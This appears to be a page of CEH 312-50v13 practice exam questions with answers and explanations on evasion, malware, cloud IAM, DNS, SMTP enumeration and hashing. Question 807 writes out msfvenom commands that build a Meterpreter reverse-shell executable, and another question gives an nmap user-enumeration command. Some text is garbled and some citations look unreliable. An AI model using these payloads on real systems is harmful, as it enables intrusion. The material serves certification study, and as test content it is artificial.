EC-COUNCIL 312-50V13 Online Practice Questions and Exam Preparation

EC-COUNCIL 312-50V13 Online Questions & Answers

• Question 801:

  Which technique is commonly used by attackers to evade firewall detection?

  A. Spoofing source IP addresses to appear trusted
  B. Using open-source operating systems
  C. Using encrypted communication channels
  D. Social engineering employees
  C. Using encrypted communication channels

  ---

  Explanation

  CEH v13 identifies encrypted communication channels as one of the most common and effective firewall evasion techniques. Firewalls that rely on packet inspection or signature-based filtering often cannot inspect encrypted payloads without SSL/TLS interception capabilities.

  By encrypting malicious traffic--using HTTPS, VPN tunnels, or encrypted C2 channels--attackers can bypass firewall rules that inspect packet contents. CEH v13 emphasizes that this technique is widely used in malware communication, data exfiltration, and command-and-control operations.

  IP spoofing (Option A) is limited by ingress and egress filtering and is less effective against modern firewalls. Open-source operating systems (Option B) do not inherently evade firewalls. Social engineering (Option D) targets users, not firewalls.

  Therefore, Option C is the correct and CEH-aligned answer.

• Question 802:

  A penetration tester identifies malware that monitors the activities of a user and secretly collects personal information, such as login credentials and browsing habits. What type of malware is this?

  A. Worm
  B. Rootkit
  C. Spyware
  D. Ransomware
  C. Spyware

  ---

  Explanation

  CEH defines spyware as malware designed to covertly observe user behavior and transmit sensitive information to attackers without the victim's knowledge. Spyware commonly records keystrokes, browser activity, form submissions, application usage, and other personally identifiable information. CEH highlights that spyware often operates silently and may disguise itself as legitimate software, making detection difficult. Unlike rootkits--which hide processes and files--or worms that self-replicate, spyware focuses exclusively on monitoring and data exfiltration. It is frequently installed through phishing, drive-by downloads, browser vulnerabilities, or malicious installers. Spyware can serve as a stepping stone for further system compromise by providing attackers with credentials for privilege escalation, lateral movement, or financial theft. CEH emphasizes the need for endpoint hardening, updated anti-malware engines, and behavioral analysis tools to detect such stealthy monitoring programs.

• Question 803:

  A serverless application was compromised through an insecure third-party API used by a function. What is the most effective countermeasure?

  A. Deploy a cloud-native security platform
  B. Enforce function-level least privilege permissions
  C. Use a CASB for third-party services
  D. Regularly update serverless functions
  B. Enforce function-level least privilege permissions

  ---

  Explanation

  In CEH v13 Cloud Computing , serverless architectures introduce unique security challenges, particularly around Function-as-a-Service (FaaS) permissions. When a serverless function is compromised through an insecure third-party API, the damage depends largely on what the function is allowed to do .

  Implementing function-level permission models and enforcing the principle of least privilege ensures that even if a function is exploited, its ability to execute malicious actions is strictly limited. CEH v13 strongly emphasizes granular IAM controls in serverless environments.

  While cloud-native security platforms (Option A) and CASBs (Option C) provide visibility and governance, they do not directly prevent excessive permissions. Regular patching (Option D) is important but does not mitigate permission abuse.

  CEH v13 identifies least privilege as the single most critical control in preventing serverless abuse and privilege escalation. Therefore, Option B is the correct answer.

• Question 804:

  During a cloud security assessment, you discover a former employee still has access to critical cloud resources months after leaving. Which practice would most effectively prevent this?

  A. Real-time traffic analysis
  B. Regular penetration testing
  C. Enforcing timely user de-provisioning
  D. Multi-cloud deployment
  C. Enforcing timely user de-provisioning

  ---

  Explanation

  The CEH Cloud Security module highlights identity and access management (IAM) failures as a major source of cloud breaches. Ensuring timely de-provisioning of user accounts when employees leave is a core security control.

  Option C is correct.

  Options A and B detect issues but don't prevent access persistence.

  Option D is unrelated to access control.

  CEH stresses joinerovereaver (JML) processes.

• Question 805:

  What is the BEST alternative if you discover that a rootkit has been installed on one of your computers?

  A. Copy the system files from a known good system
  B. Perform a trap and trace
  C. Delete the files and try to determine the source
  D. Reload from a previous backup
  E. Reload from known good media
  E. Reload from known good media

  ---

  Explanation

  Rootkits can deeply infect and compromise a system's kernel, making them very difficult to detect or remove fully. Even advanced antivirus solutions may miss them.

  The most secure and recommended response is:

  Completely wipe the compromised system.

  Reinstall the OS from known good (clean) media.

  Apply all patches and updates.

  From CEH v13 Official Courseware:

  Module 6: Malware Threats # Rootkit Handling

  Incorrect Options:

  A: Copying files might transfer infected components.

  B: Trap and trace is investigative, not remedial.

  C: Deleting files may not fully remove the rootkit.

  D: Backups might be infected if taken post-compromise.

  CEH v13 Study Guide - Module 6: Rootkit Detection and RecoverySANS Incident Handling Handbook

• Question 806:

  MX record priority increases as the number increases. (True/False.)

  A. True
  B. False
  B. False

  ---

  Explanation

  MX (Mail Exchange) records in DNS define the mail servers responsible for receiving email for a domain.

  Each MX record has a priority value.

  Important concept:

  A lower number indicates a higher priority.

  Email servers attempt delivery to the mail server with the lowest priority first.

  For example:

  If MX records are:

  10 mail1.example.com

  20 mail2.example.com

  Then mail1 will be tried first. If it fails, mail2 will be used.

  So the statement "MX record priority increases as the number increases" is false.

  CEH v13 Study Guide - Module 3: DNS Records # MX Record Priority ExplanationRFC 974 - Mail Routing and the Domain System

• Question 807:

  what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

  A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
  B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
  C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
  D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
  C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

  ---

  Explanation

  https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom

  Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler. Run `set payload' for the relevant payload used and configure all necessary options (LHOST, LPORT, etc). Execute and wait for the payload to be run. For the examples below it's pretty self explanatory but LHOST should be filled in with your IP address (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.

  Example for Windows:- msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

• Question 808:

  During a black-box penetration test, an attacker runs the following command:

  nmap -p25 --script smtp-enum-users --script-args EXPN,RCPT

  The script successfully returns multiple valid usernames. Which server misconfiguration is being exploited?

  A. The SMTP server allows authentication without credentials
  B. The SMTP server has disabled STARTTLS, allowing plaintext enumeration
  C. SMTP user verification commands are exposed without restrictions
  D. DNS MX records point to an internal mail relay
  C. SMTP user verification commands are exposed without restrictions

  ---

  Explanation

  The CEH Enumeration module explains that SMTP supports commands such as VRFY, EXPN, and RCPT TO , which can be abused to enumerate valid email users if not properly restricted.

  In this scenario, the smtp-enum-users Nmap script successfully uses EXPN and RCPT , indicating that the server responds differently to valid and invalid usernames.

  Option C is correct because unrestricted SMTP user verification allows attackers to harvest usernames for further attacks such as phishing or brute force.

  Option A involves authentication, not enumeration.

  Option B affects confidentiality, not user discovery.

  Option D is unrelated to SMTP enumeration.

  CEH strongly recommends disabling or restricting these SMTP commands.

• Question 809:

  Which of the following is assured by the use of a hash?

  A. Authentication
  B. Confidentiality
  C. Availability
  D. Integrity
  D. Integrity

  ---

  Explanation

  A cryptographic hash function is used to ensure data integrity. It generates a fixed-length output (digest) from any size of input data. If the data is modified in any way, the resulting hash will change. This allows systems to detect data tampering, ensuring that the data remains unaltered from its original form.

  CEH v13 Official Study Guide:

  Module 20: Cryptography

  Quote:

  "Hash functions are used to ensure the integrity of a message or file by producing a unique digest that changes if the data is modified."

  Incorrect Options:

  A. Authentication ensures identity, not data integrity.

  B. Confidentiality is achieved via encryption, not hashing.

  C. Availability pertains to system uptime and accessibility, not hashes.

• Question 810:

  How can you determine if an LM hash you extracted contains a password that is less than 8 characters long?

  A. There is no way to tell because a hash cannot be reversed
  B. The rightmost portion of the hash is always the same
  C. The hash always starts with AB923D
  D. The leftmost portion of the hash is always the same
  E. A portion of the hash will be all 0's
  B. The rightmost portion of the hash is always the same

  ---

  Explanation

  In LM hashing (used in legacy Windows systems), passwords are split into two 7-character chunks. If a password is fewer than 8 characters, the second half is padded with nulls and hashed to a constant value.

  That constant is:

  AAD3B435B51404EE

  Thus, the second half of the LM hash (the rightmost 16 characters) is always the same if the password is < 8 characters.

  From CEH v13 Courseware:

  Module 6: Malware Threats # LM Hash Characteristics

  CEH v13 Study Guide states:

  "If the password is less than 8 characters, the second half of the LM hash will always be `AAD3B435B51404EE', indicating the hash belongs to a short password."

  CEH v13 Study Guide - Module 6: Understanding LM/NTLM Hashes